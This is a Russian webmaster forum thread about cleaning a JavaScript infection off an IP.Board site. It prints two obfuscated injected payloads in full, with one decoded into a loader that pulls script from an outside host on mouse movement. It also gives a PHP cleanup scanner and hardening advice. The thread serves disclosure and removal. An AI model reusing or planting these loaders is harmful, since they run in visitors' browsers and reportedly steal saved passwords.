Posted 1 марта, 201212 yr comment_700 Итак, недавно наш форум столкнулся с фреймом, который антивирусы посчитали за вирусную ссылку. Так как это мой первый опыт с вирусом на сайте/форуме, то я его обнаружил не так быстро, как мне хотелось.. Поделюсь опытом удаления 'плохого' скрипта с форума. Как работал фрейм? Очень просто: при загрузке страницы, подгружающей заражённый яваскрипт, он активировался при малейшем движении курсором мышки и подгружал яваскрипт с какого-то постороннего сайта, в моём случае это был ___constructivehell.is-a-cubicle-slave.com/g/1351559130384.js; что делает этот скрипт — неизвестно. Название подгружаемого скрипта генерировалось автоматически. Первое, что пришло мне на ум — сделать резервную копию форума и слить её на компьютер, а там уже разными прогами искать вирус по тексту в файлах.... Что я и сделал. Скачав копию форума, я начал искать название ссылки, которую блокировал антивирус, во всей копии с помощью программы Folder Find Text, но все мои попытки были напрасными.. Ссылка не находилась (как выяснилось позже — потому что в файлах она лежит не открытым текстом, а в закодированном виде). Тогда я обратился к хостеру, который подсказал мне, где может находиться вирус и как его обнаружить (золотой же человек мой хостер ). То, что вирусный код содержится в яваскриптах, он сказал однозначно и уверенно. Как же мне найти этот код? Было предложено отсортировать файлы по дате изменения и уже смотреть их.. Но я пошёл другим путём: поискал в интернете подобный случай и обнаружил, что этот код кодируется в скриптах. Там же я обнаружил, как именно он кодируется, и по небольшому кусочку кода начал поиск по резервной копии.. Результаты поиска меня просто шокировали: около 200 яваскриптов было заражено этим кодом.
Вот как он выглядит в зашифрованном виде: var tdf7003="";function nabc155c58d(){var m8cb2ed7=String,f475cf=Array.prototype.slice.call(arguments).join(""),kd969a1=f475cf.substr(rc176e(),3)-573,k0c027f7a,l089296;f475cf=f475cf.substr(17);var ia0a771c7=f475cf.length;for(var k6cbf7811=0;k6cbf7811<ia0a771c7;k6cbf7811++){try{throw(k71b3b=f475cf.substr(k6cbf7811,1));}catch(e){k71b3b=e;};if(k71b3b=='}'){kd969a1="";k6cbf7811=v7fd954e3(k6cbf7811);s781897=ofbf416a(f475cf,k6cbf7811);while(s781897!='}'){kd969a1+=s781897;k6cbf7811++;s781897=oa6558(f475cf,k6cbf7811);}kd969a1-=373;continue;}k0c027f7a="";if(ded203d6a(k71b3b)){k6cbf7811++;k71b3b=f475cf.substr(k6cbf7811,1);while(k71b3b!='±'){k0c027f7a+=k71b3b;k6cbf7811++;k71b3b=f475cf.substr(k6cbf7811,1);}k0c027f7a=i61bbb(k0c027f7a,kd969a1,23);if(k0c027f7a<0)k0c027f7a+=256;k0c027f7a=k8016e5(k0c027f7a);j33797fa(k0c027f7a);continue;}b6ed78d=l85b5d784(k71b3b);if(b6ed78d>848)b6ed78d-=848;l089296=b6ed78d-kd969a1-23;if(l089296<0)l089296+=256;if(l089296>=192)l089296+=848;else if(l089296==168)l089296=1025;else 
if(l089296==184)l089296=1105;tdf7003+=m8cb2ed7["x66romx43x68ax72x43x6fx64x65"](l089296);}}nabc155c58d("c","998c","d","7","1","d","c1ea2","65","8","±1","4","8","±}","441","}","±19","3","±","±20","8±±","20","1±","}5","31","}±2","4","±}4","0","5}","±","171±±","1","60±±166","±","}4","3","5","}±1","95","±}5","38","}±","228±","}","5","60}±25","1","±","±2","42","±M±","2","2","3±±22","0","±}5","52","}","±2","11","±","}","43","9}","±","207","±}","5","20","}±11","±","±","2","8","±","}","5","6","0}±","2","42","±GD",">±2","42","±±","15±±","2","4","2","±}52","8","}±217","±","±26","±&","}41","4","}±1","8","0","±","±","176±","z","o","}","5","06}","±203±±2","5","5","±","}57","3","}N","}47","4","}±2","3","4±}491","}","±0","±±1±","}","438","}±","2","0","2","±","±","2","05±","±","18","7±}4","14","}","±","1","8","0","±}563}",">}","4","8","0}±2","4","8","±","±","231±","}","56","7}A}5","2","2","}±1","7±}49","8}±","0±±","0±}563}","±3±>H}","56","0}","±","25","5±}38","7","}±","1","34±R","}4","3","6}","±","1","85±","±20","3","±","±1","8","4","±","±","191","±","±1","8","5±","}495}±2","53±±24","6±±","1","90","±","±4","±","±2","53±","±","2","4","2±","}","3","75}","±","1","4","3","±","±1","26±G","}","50","2}","±","2","5","1±±","7±","±","5","±","±199±","±","2","5","5±}","4","5","9}±156","±±","14","8±}","532}","±","241±±1","9","5±","±192±","±","191","±}541","}(}","4","0","3","}±1","55","±","U]±1","69±}483","}±2","54","±±245","±","}","5","30","}±","2","5±","}","4","7","0}±","23","1±","}","4","3","4","}±18","6±t±","203±±","1","89","±","}572","}","L}55","7","}","3}","5","4","2}/","7}","49","9}±","1","9","5±±1","3±}","419}±","19","0±}","489","}±","5±}","3","9","1","}","±1","4","3","±}537}","'±2","8±}","487","}±","2","4","0","±","±1","6","9±±","19","8","±}","424","}","±","13","5","±","±","13","5±}","487","}","±169±±","17","6±","}","528","}'}","5","51}","7","-",".","/}","4","87}±","24","2","±","±24","7±}","4","11","}","±","16","2","±±","1","61","±d","}404","}","_V±","1","7","7","±C","@","??}","5","2","0
}","!","}","5","1","7}","±1","6","±","±","21","±","±","1","1","±","}4","2","2","}±183","±","}5","69}R}4","5","5}","±","1","5","1±","±225","±","±","2","26±}5","35","}3}","5","2","6}±","2","2±","±","28","±±1","7","±","±","2","3±","}472","}","±","1","54±","±","183","±±","15","4±","}","46","0}","±1","58±}4","28}±1","3","7±}","55","3","}","±216±","}","37","8}&","}4","07}B","}457","}±232","±","xu","}506}","±165±","±0","±","}5","2","0}±2","5","±±13±","}5","2","4","}#±27±","}","50","8}±3±","}","4","6","4","}±","2","2","4±","}","397}±","1","63±}41","7}q","±","178±","}","56","9","}I}","45","2","}±","211","±±2","13","±±","2","1","9","±±2","1","7","±","}52","9","}","±24±","±3","2","±")±24","±","±","2","1","1±}","4","57}","±","1","68±±","139±","}468","}","±220","±}","45","8}","±","2","2","5±±2","18±","±","2","07","±","}3","93","}","±","159","±","}","42","1","}","±","17","6±±","182","±±1","81±","o","}416}","kb","±18","9±","O","}431","}","[","Z}","4","5","3}p","±20","8±","}","38","0","}","±132","±","}","5","7","0","}","±252","±}","4","9","4","}±184","±}432","}±","2","01","±","}","55","9}",":","?5}","4","36}±","1","9","7±","}434","}","±20","3±","±","130","±}4","48}±","21","8±}","43","3}","±20","4±","}","3","9","1}±","1","63±","±1","43±","±1","49","±}484","}±","231","±}","4","55","}","±2","0","8±±","137±","±1","6","6","±}","464}±","17","5±}54","6","}±1","±}398","}","P","}5","15}","±2","1","3","±","±2","0","6","±","±1","9","7±}","56","3","}","P}","50","9","}±","1","7","2","±}4","7","9}±","1","39±","±138±","}414","}","I}5","5","0","}±","2","09","±","}421","}±1","90","±±1","76±","}","5","1","3}±","17","±","}","3","78","}","±1","2","8±}4","4","4","}","±2","0","5","±}56","3}","L±3±","}48","6","}±","0","±","}","53","1","}.}","4","97","}","±1","3","±","}436","}±1","8","8±±194","±","±","1","8","3","±","}","5","09}±","6±}","3","86","}D","}4","1","8}±1","2","9±","}","5","50","}±23","2","±±","2","4","9±","}","403","}p","}4","3","9}f","}3","99","};",":}39","6","}7}3","82}",")","}","46","4}","±"
,"232","±±2","1","1±±","22","8","±","}","4","3","4","}t","}555","}5","}4","43}","±1","94±±1","90","±","±19","3","±}3","9","4","}L","}4","8","5","}","±","19","6±±167±±235","±±","24","6","±±2","3","4±","}","55","4","}A}46","6","}±22","5±±21","7±","}4","01","}","±","1","6","1±}5","2","2","}±32","±","±218","±}55","5","}","4","}","4","71}","±222","±","±2","37±","±19","0±","±","2","29±}","429}","±18","0±}5","3","0}!±","2","5±"('±","24","6","±","-±","8±}","50","7}","±","2","54±±4","±","}","53","5}","±","7±","±26±","}","389}","±","1","48±±14","0","±}44","3","}±1","33±}","45","4}±143±","±208","±±20","5±±20","1±±","2","0","4±","±","1","4","3±","}","39","7}","X±13","8","±}405","}","g","}5","5","3}(}","46","8}±1","7","7","±","±13","1","±±","1","2","8±","}4","1","4","}","I","}","503}±","1","6","2","±±1","62","±","}49","0","}","±2±}","4","67}±","2","1","4","±","±2","31±","±","1","4","9","±}472}","±","2","3","7±±","22","1±","±","2","36±±","227","±","}4","16}±","17","8±±1","82±b±1","2","7±","}40","9","}","[±","159±}","5","1","4","}","±","1","9","±","}","5","0","6}","±","2","55","±}3","7","8}","±","14","5","±±","1","37±}","446","}","±","19","7","±±2","0","6±±212","±±1","4","2±","±195","±","±2","10","±}538}","!}","4","3","0}","±","1","7","7±}","4","55}±","2","2","1","±","±","20","6","±}528}±","247±","±30","±}52","2","}±","1","7","±","±2","5±±1","7±","±2","6","±","}","5","65","}","K","±2","5","5±","}5","2","4","}±213","±!}4","14}±","16","3±±1","7","8±}","527}±2","6","±","}","423","}","±1","85±","}5","31","}",")","}5","04}±","19","3","±","±","19","5","±±21","3","±","}","5","0","3}±1","66±","}","4","4","5","}","i","}499}","±","158","±±1","58±","±","15","8","±}","3","9","0","}±","155±±1","3","9±","}54","8}8}42","4}±1","79","±±","186","±}","547}","9","}5","52","}±","2","4","8","±>","}566","}QH=}511","}","±","193±±","222","±}3","9","2}J","Q±158","±","±1","4","3","±±16","2±}","3","8","6}","±","1","52±","}44","6","}±","143","±}45","4}±21","0±","±2","01±","±","2","2","2","±","±","2","0","1±",
"±2","1","9","±±2","0","3±}49","0","}","±","254±","}538}%}376","}","±1","3","8","±","}49","9","}","±","9±","±1","88±","±","208","±","±","1","62±","±","1","59±±1","58","±","}","48","7","}±","14","6","±±1","4","6","±}384","}±","1","49±","±","13","3","±±1","48±","}","48","2}±","2","37±}","55","3};","?}55","2","}±248","±","98","}4","4","4","}","±","2","08±±","19","5±","±191","±","±1","94","±}5","6","8}","S","}","522","}","±","3","1±","}56","4","}","J7","}","54","4","}","6","}3","82","}","±13","3","±±","131","±±1","36","±±","1","29±","±1","4","2","±±1","35","±","±133±","@]}","5","25","}±","20","7±±","21±","}5","45}81","&","}4","26","}","±","1","9","2±","}","39","9}","±","1","5","4","±","±","160±}","5","4","0},","±","2","22","±","}51","2}±2","02±}","53","3}±2","24±}377};±","1","50","±","}47","6}","±","139","±}","382}","*",")}","5","6","5}","±2","2","4","±","±","2","2","4±","±","2","24±@}43","0}","±","1","8","2","±}5","5","9","}±","2","4","1","±","}","525","}","±215±}","49","1","}±","1","±}","504","}","±2","±","}4","00","}±1","55","±}","4","62}±2","2","7±±15","8","±±22","6±±213±","}5","3","3}","±24","±","}389}","±139","±","}4","16}","±187","±","±1","49±","±1","82","±}","4","15","}","±1","62","±±","181±","}47","7}","±","2","28","±±","1","59","±}","4","35}±1","4","6±}37","5}V","}","4","09","}[","}563}±","252","±}4","18}","±","1","6","7±","}5","4","2","}/-}5","62","}","D@}3","8","9","}","±","140","±}5","2","4}",""±1","9±","}","50","0}±","1","8","9±±191","±}405}","W","±","178±","DA@@","@","}4","2","9","}XX±19","8","±}","5","22}","±","21","±","±2","6±","}5","5","1","}-}","48","1}±242±","}56","6}O","}514}","±","210","±","±2","8±","±29","±}4","75}±2","4","7±}","4","4","3","}±","19","5","±±201±}","39","8","}","±","1","45","±","}","447}±2","0","0±}","5","5","8}","±2","4","0±","±1","3","±±","2","4","0","±","}","41","3","}q","}43","9","}","±","148±","}","5","0","0}","±16","3","±}","4","42}","f}","45","2}","ooo","}","517","}","±","1","76","±}5","27}.","}","491}±15","4±","±151±","±15",
"0","±","}41","5}","J","J","}5","30}","1","}","549","}","±2","±±2","12±±","209±","}","5","4","7","}","±","2","06","±±2","0","6","±","±","2","06","±","8","(}4","9","9}±7±}","4","3","7","}","±","1","92±","}5","70}L","}","45","5","}±","2","21±±","1","51±}49","1","}±252±","}","5","5","7}=}48","3}±","24","1±±24","4","±","}4","9","6","}","±","243","±","±","246","±}","5","2","6","}","±2","08±±237±±2","08±±","22±}","430","}","±","1","9","7±}","45","9","}±2","1","9","±","±208±","}","3","8","9}","±155±","±","1","4","4","±","±","1","50±}5","70}","J","±","4","±±","5","±}","5","4","1}","±","2","23±}","397","}±170±<}4","1","0}F","}","49","7","}","±1","56","±±","1","5","6","±","±1","5","6±±1","56±","±","10","±}","4","33}","±","18","8±","}","5","5","4","}",":","}4","4","2","}","±19","2","±","}53","4}'","/","±230","±}","415","}±","1","85","±","}474}±2","45±±24","6","±","±","22","6±±","23","2","±","±2","21±","±2","27±±156","±}","47","5","}±1","8","6","±±1","5","7±","}","420}x","}","380}Y+","(","}","4","73}","±","132","±±","1","32","±±","1","3","2","±","}37","6","}±1","51±}4","2","9}±138","±Y","}","3","78}","%%}449}l","}4","62","}","±","22","7","±","}","3","80}","±","129","±","}","429}","±19","3","±}44","5","}±200","±","±","20","7","±±2","11±}","41","2}l","}","48","7}±","25","2±","±","251±","}","488}","±","2","3","7","±","±17","0","±","}3","77}X","}","554}±236±","A>","}4","9","2","}","±","25","0","±","±","1","74","±±18","5","±","±1","7","4±","±21","9","±±","2","3","9±±2±","}","4","5","8","}±","2","12","±}","5","42}","±","2","3","8","±2","!}","5","31}","#","}42","4","}","±","1","7","4±±1","85","±±1","8","3","±r","}5","73","}±8±","}4","74}","±","17","0","±","±","2","4","0±}","5","26}±","3","1±","}44","4","}","±","177","±±","2","1","0±±","208±","±","19","9","±}","4","3","2}","±","1","9","2","±","±","1","8","5","±}","41","3","}","g}","5","1","2","}","±20","3±","}4","9","7","}","±","1","93±}","4","13}","±","1","7","8","±±1","80","±","±1","61","±","}","3","9","4}","±","1","5","9±","}","380"
,"}±","146","±}4","9","7}±5±","±2","5","2±}","3","9","3","}","±","1","5","3","±}44","0","}±","1","93","±}4","65","}±","15","5","±","±166","±","±","1","56","±}4","59}±1","41","±","±","1","52","±","±","14","1±","±1","4","8±}","395","}","[","}46","9}","±","2","25","±}","411","}","±1","76","±}","4","9","8}±1","8","7","±","±","207","±}","5","5","9","}±","2","2","2","±}5","6","3}±","22","3±","±","22","2","±±2","22±","}53","6","}","±","195","±}5","5","9}","9}4","7","1}±2","22±","±218±","±2","21","±}5","50","}±24","6±",")}","49","8}","±","4","±","±4","±","}52","7}±2","2","±","±3","1±","±21","±±","2","44","±","±25±±","26","±±","29±","}5","3","9","}!","±2","29","±","}","5","1","2","}","±","2","1±}","5","3","0","}","±23±&","}4","71","}","±226±}","49","9}","±","5","±}","43","0","}±","196±","}47","3}±16","4±±1","82±","±1","3","6","±±1","3","3±","±","1","32±}","4","17","}","L±","192","±PML","±","1","9","2±","±126±","}","4","80}±1","43","±","±","14","0","±}375","}","±","1","50±","}397","}X}","498","}","±","188","±","±18","9±","}50","7","}","±216","±","");eval(tdf7003);function rc176e(){return 14;}function v7fd954e3(y328166){return ++y328166;}function ofbf416a(c68a9f9,c2c81e){return c68a9f9.substr(c2c81e,1);}function oa6558(xeea275f0,y47011595){return xeea275f0.substr(y47011595,1);}function k8016e5(lb3daa13){if(lb3daa13==168)lb3daa13=1025;else if(lb3daa13==184)lb3daa13=1105;return (lb3daa13>=192 && lb3daa13<256) ? 
lb3daa13+848 : lb3daa13;}function ded203d6a(k835fa24e){return k835fa24e=='±';}function i61bbb(o764cf3,s3c613,g05e26cf8){return o764cf3-s3c613-g05e26cf8;}function j33797fa(t4c415){var m8cb2ed7=String;tdf7003+=m8cb2ed7["x66romx43x68ax72x43x6fx64x65"](t4c415);}function l85b5d784(vad933){return (vad933+'')["chax72x43odex41t"](0);} А вот как в расшифрованном виде: (function() { var url = '__constructivehell.is-a-cubicle-slave.com/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function() { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); [/code] [/spoiler] Пришлось очищать каждый скрипт от этого кода. У меня сразу же возникло пару вопросов: Как он мог проникнуть в скрипты на сервере? Кто его туда записал? По моему [u]не профессиональному[/u] мнению, я могу лишь предположить, что у меня просто угнали данные для доступа к FTP, что можно проверить по логам, было ли там копирование, а затем замена практически всех яваскриптов на форуме... Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/ Share on other sites Больше вариантов
3 марта, 201212 yr comment_787 Сталкивался много раз с этой проблемой на булке, но до этого момента, кстати, не замечал, чтобы на IPB было похожее. Касперыч мой ругался на вирусяку и не давал ей загрузиться в браузере. Картинко: Данный зверюга ворует ваши пароли, хранящиеся в памяти браузера, не важно, когда вы их ввели или сохранили в памяти браузера. Скрипт заливается очень просто (как это было с булкой): просто создаётся новый юзер "с скрытыми символами" — XSS-атака, а также сообщением или картинкой. Бороться можно. Достаточно ограничить доступ к файлам и папкам (непосредственно на фтп выдать нужные права для файлов — ТОЛЬКО ЧТЕНИЕ). Ну или некоторые мои знакомые писали скрипты, которые каждый час проверяли изменение файлов на фтп. Так тоже можно ^^ И кстати, Паш, настрой права у моей группы. Я в чате писать не могу :D
3 марта, 201212 yr Author comment_789 Будем знать) Права поправил! Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=789 Share on other sites Больше вариантов
14 апреля, 201212 yr Author comment_2681 Если у кого возникла такая же проблема с сайтами, могу скинуть скрипт, который автоматом удалит вирус из всех яваскриптов.. PS: была обнаружена другая модификация данного вируса.. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=2681 Share on other sites Больше вариантов
18 мая, 201212 yr comment_4578 Похожая беда на моём форуме: изменил пароли на фтп и все остальные, удалил свой фтп-клиент, запретил браузеру хранить пароли, перезалил все файлы форума и дополнений. Но всё же иногда попадается посторонний код в конце js-файлов (видимо, какие-то устаревшие файлы от старых версий форума). Но код у меня был другой, кажется, начинался с try; если опять встречу, выложу. В логах фтп нашёл этот ip: 62.122.79.1. Скиньте, плз, скрипт и подскажите, какие права на папки и файлы лучше поставить, чтобы потом не было проблем в работе форума.
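18 мая, 201212 yr Author comment_4579 Вот скрипт:
<?php
/* ----------------------------------------------------------------------------------
dScaner Class - START
---------------------------------------------------------------------------------- */
/**
 * dScaner - scans a directory tree for files of the given type that contain a
 * marker string (for example a fragment of injected JavaScript), strips the
 * lines carrying that marker, and keeps a "<file>_BACKUP" copy next to every
 * file it rewrites so the change can be undone with restore_backups().
 *
 * Developer: Денис Ушаков
 * Date: 03-04-2012
 * Version: 0.0.3
 *
 * NOTE(review): the copy of this class posted above has lost the backslash in
 * its newline separators (they read "n" instead of "\n"), which would split on
 * the letter n and delete far more than the matching line. The newline is
 * restored here. Other fixes: strpos() results are compared with === / !==
 * (the original "== true" missed a match at offset 0), the directory is no
 * longer made world-writable (0777) while a file is rewritten, file names are
 * HTML-escaped before being printed, and the backup is deleted via the same
 * path it was read from.
 */
class dScaner
{
    /** Directory entries that are never descended into or scanned. */
    private $dir_disallow = array('.', '..', '.htaccess', '.git');

    /** Inline styles of the green (ok) and red (failed) result lines. */
    private $style_ok   = "display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;";
    private $style_fail = "display:block; padding:5px; border:1px solid #822121; background-color:#ea7575; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;";

    /**
     * Split a delimited parameter string into an array.
     *
     * @param string|null $get_str   delimited list, e.g. ".js,.htm"
     * @param string|null $separator delimiter between the list items
     * @return array|false the items, or false when the list or the separator is empty
     */
    function request($get_str, $separator)
    {
        // explicit checks instead of empty(): empty("0") is true in PHP, and
        // explode() with an empty separator is an error
        if ($get_str === null || $get_str === '' || $separator === null || $separator === '') {
            return false;
        }
        return explode($separator, $get_str);
    }

    /**
     * Print the path of every file under $path that contains $requested_string.
     *
     * @param string       $path             directory to start the scan from
     * @param string|array $files_allowed    substring(s) a file name must contain to be scanned
     * @param string       $requested_string string to search for
     */
    function find($path, $files_allowed, $requested_string)
    {
        if ($requested_string === '') {
            return; // an empty needle would report every file
        }
        foreach ($this->targetFiles($path, $files_allowed) as $file) {
            $contents = file_get_contents($file);
            if ($contents !== false && strpos($contents, $requested_string) !== false) {
                $this->report($file, " - в файле обнаружена искомая строка. ", true);
            }
        }
    }

    /**
     * Remove every line containing $requested_string from the matching files.
     * A "<file>_BACKUP" copy of the original is written before the file is
     * rewritten, so a failed rewrite loses nothing.
     *
     * @param string       $path             directory to start the scan from
     * @param string|array $files_allowed    substring(s) a file name must contain to be scanned
     * @param string       $requested_string marker that identifies an injected line
     */
    function scan($path, $files_allowed, $requested_string)
    {
        if ($requested_string === '') {
            return; // PHP 8 strpos() matches an empty needle everywhere: every line would be dropped
        }
        foreach ($this->targetFiles($path, $files_allowed) as $file) {
            $contents = file_get_contents($file);
            if ($contents === false || strpos($contents, $requested_string) === false) {
                continue;
            }
            // keep only the lines that do not carry the marker
            $kept = array();
            foreach (explode("\n", $contents) as $line) {
                if (strpos($line, $requested_string) === false) {
                    $kept[] = $line;
                }
            }
            $dir = dirname($file);
            $restore_mode = $this->makeWritable($dir);
            $backup_ok = file_put_contents($file . '_BACKUP', $contents) !== false;
            // "!== false": an emptied file is a 0-byte write, which is still a success
            $written = $backup_ok && file_put_contents($file, implode("\n", $kept)) !== false;
            if ($restore_mode !== null) {
                chmod($dir, $restore_mode);
            }
            if ($written) {
                $this->report($file, " - Файл очищен. (+ BACKUP) ", true);
            } else {
                $this->report($file, " - Файл НЕ очищен. ", false);
            }
        }
    }

    /**
     * Put every matching file back from its "<file>_BACKUP" copy and delete the copy.
     *
     * @param string       $path          directory to start from
     * @param string|array $files_allowed substring(s) a file name must contain to be restored
     */
    function restore_backups($path, $files_allowed)
    {
        foreach ($this->targetFiles($path, $files_allowed) as $file) {
            $backup = $file . '_BACKUP';
            if (!is_file($backup)) {
                continue;
            }
            $contents = file_get_contents($backup);
            if ($contents !== false && file_put_contents($file, $contents) !== false) {
                // same path that was tested above; the original unlinked a
                // DOCUMENT_ROOT-prefixed variant and could leave the backup behind
                unlink($backup);
                $this->report($file, " - восстановлен. ", true);
            } else {
                $this->report($file, " - НЕ восстановлен. ", false);
            }
        }
    }

    /**
     * Collect, in readdir() order, the regular files under $path whose name
     * matches $files_allowed, skipping "*_BACKUP" copies and the entries in
     * $dir_disallow. Sub-directories are walked recursively.
     *
     * @param string       $path          directory to walk
     * @param string|array $files_allowed substring(s) a file name must contain
     * @return string[] full paths
     */
    private function targetFiles($path, $files_allowed)
    {
        $found = array();
        if (!is_dir($path)) {
            return $found;
        }
        $base = rtrim($path, '/\\') . '/';
        $handle = opendir($base);
        if ($handle === false) {
            return $found; // unreadable directory: nothing to scan
        }
        while (false !== ($entry = readdir($handle))) {
            if (in_array($entry, $this->dir_disallow, true)) {
                continue;
            }
            $full = $base . $entry;
            if (is_dir($full)) {
                // symlinked directories are not followed: a link back up the tree would recurse forever
                if (!is_link($full)) {
                    $found = array_merge($found, $this->targetFiles($full . '/', $files_allowed));
                }
            } elseif (is_file($full)
                && $this->nameMatches($entry, $files_allowed)
                && strpos($entry, '_BACKUP') === false
            ) {
                $found[] = $full;
            }
        }
        closedir($handle);
        return $found;
    }

    /**
     * True when $name contains $files_allowed (a string) or any element of it (an array).
     *
     * @param string       $name          file name without directory
     * @param string|array $files_allowed substring(s) to look for
     * @return bool
     */
    private function nameMatches($name, $files_allowed)
    {
        $patterns = is_array($files_allowed) ? $files_allowed : array($files_allowed);
        foreach ($patterns as $pattern) {
            if ($pattern !== '' && strpos($name, $pattern) !== false) {
                return true;
            }
        }
        return false;
    }

    /**
     * Give the owner write access to $dir only when it is not writable already.
     * Only the owner-write bit is added (the original chmod(0777) made the
     * directory world-writable, if only briefly).
     *
     * @param string $dir directory that is about to receive a rewritten file
     * @return int|null the original mode to restore afterwards, or null when nothing was changed
     */
    private function makeWritable($dir)
    {
        if (is_writable($dir)) {
            return null;
        }
        $perms = fileperms($dir);
        if ($perms === false) {
            return null;
        }
        $mode = $perms & 0777;
        return chmod($dir, $mode | 0200) ? $mode : null;
    }

    /**
     * Print one result line in the green (ok) or red (failed) style.
     *
     * @param string $file    file the line is about
     * @param string $message text appended after the file name
     * @param bool   $ok      true for the green style, false for the red one
     */
    private function report($file, $message, $ok)
    {
        $style = $ok ? $this->style_ok : $this->style_fail;
        // file names come from a file system the attacker has already written to,
        // so escape them before echoing into the page
        print "<span style='" . $style . "'>" . htmlspecialchars($file, ENT_QUOTES, 'UTF-8') . $message . "</span> ";
    }
}
/* ----------------------------------------------------------------------------------
dScaner Class - END
---------------------------------------------------------------------------------- */
?>
[/CODE] [/spoiler] но код у меня был другой, кажеться начинался с try, если опять встречу, выложу. Выкладывай, посмотрим что у тебя за код.. Права изменять бесполезно - злоумышленник при внедрении вредоносного кода имеет доступ к файлам через FTP.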
18 мая, 201212 yr comment_4580 вот этот код: try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$5
6$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} 
